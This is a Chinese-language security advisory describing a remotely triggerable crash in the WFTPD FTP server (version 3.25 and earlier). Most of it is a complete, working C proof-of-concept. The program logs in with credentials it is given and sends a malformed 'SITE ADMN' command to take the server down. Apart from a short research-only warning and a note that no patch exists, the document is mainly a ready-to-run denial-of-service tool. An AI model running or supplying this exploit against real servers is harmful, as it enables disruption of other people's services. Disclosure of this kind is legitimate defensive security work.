发布日期：2007-01-15
更新日期：2007-01-16

受影响系统：

Texas Imperial Software WFTPD <= 3.25

描述：

---

BUGTRAQ  ID: 22046

WFTPD是Windows平台下的FTP服务程序。

WFTPD在处理带有超长畸形参数的SITE ADMIN命令时存在漏洞，远程攻击者可以通过发送畸形的命令导致服务器发生崩溃。

<*来源：Marsu （Marsupilamipowa@hotmail.fr）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS                                     *
*                                                                       *
*Sending command SITE ADMN + \32 makes server BOOM                      *
*                                                                       *
*usage: wftpd_dos.exe ip port user pass                                 *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    struct hostent *he;
    struct sockaddr_in sock_addr;
    WSADATA wsa;
    int ftpsock;
    char recvbuff[1024];
    char evilbuff[100];
    int buflen=100;

    if (argc!=5)
    {
        printf("[+] Usage: %s <ip> <port> <user> <pass>\n",argv[0]);
        return 1;
    }
    WSACleanup();
    WSAStartup(MAKEWORD(2,0),&wsa);

    printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("Failed\n[-] Could not init gethostbyname\n");
        return 1;
    }
    if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Failed\n[-] Socket error\n");
        return 1;
    }

    sock_addr.sin_family = PF_INET;
    sock_addr.sin_port = htons(atoi(argv[2]));
    sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(sock_addr.sin_zero), '\0', 8);
    if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
        printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
        return 1;
    }
    printf("OK\n");
    memset(recvbuff,'\0',1024);
    recv(ftpsock, recvbuff, 1024, 0);

    memset(evilbuff,'\0',buflen);
    memcpy(evilbuff,"USER ",5);
    memcpy(evilbuff+5,argv[3],strlen(argv[3]));
    memcpy(evilbuff+5+strlen(argv[3]),"\r\n\0",3);
    printf("[+] Sending USER ... ");
    if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
        printf("Failed\n[-] Could not send\n");
        return 1;
    }
    printf("OK\n");
    memset(recvbuff,'\0',1024);
    recv(ftpsock, recvbuff, 1024, 0);

    memset(evilbuff,'\0',buflen);
    memcpy(evilbuff,"PASS ",5);
    memcpy(evilbuff+5,argv[4],strlen(argv[4]));
    memcpy(evilbuff+5+strlen(argv[4]),"\r\n\0",3);

    printf("[+] Sending PASS ... ");
    if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
        printf("Failed\n[-] Could not send\n");
        return 1;
    }
    printf("OK\n");
    recv(ftpsock, recvbuff, 1024, 0);

    memset(evilbuff,'\0',buflen);
    memcpy(evilbuff,"SITE ADMN ",10);
    memset(evilbuff+10,32,1);            //this char is powerfull :p
    memcpy(evilbuff+10+1,"\r\n\0",3);

    printf("[+] Sending SITE ADMN ... ");
    if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
        printf("Failed\n[-] Could not send\n");
        return 1;
    }
    printf("OK\n");

    printf("[+] Host should be down\n");
    return 0;
}

建议：

---

厂商补丁：

Texas Imperial Software
-----------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.wftpd.com/

浏览次数：2783
严重程度：0（网友投票）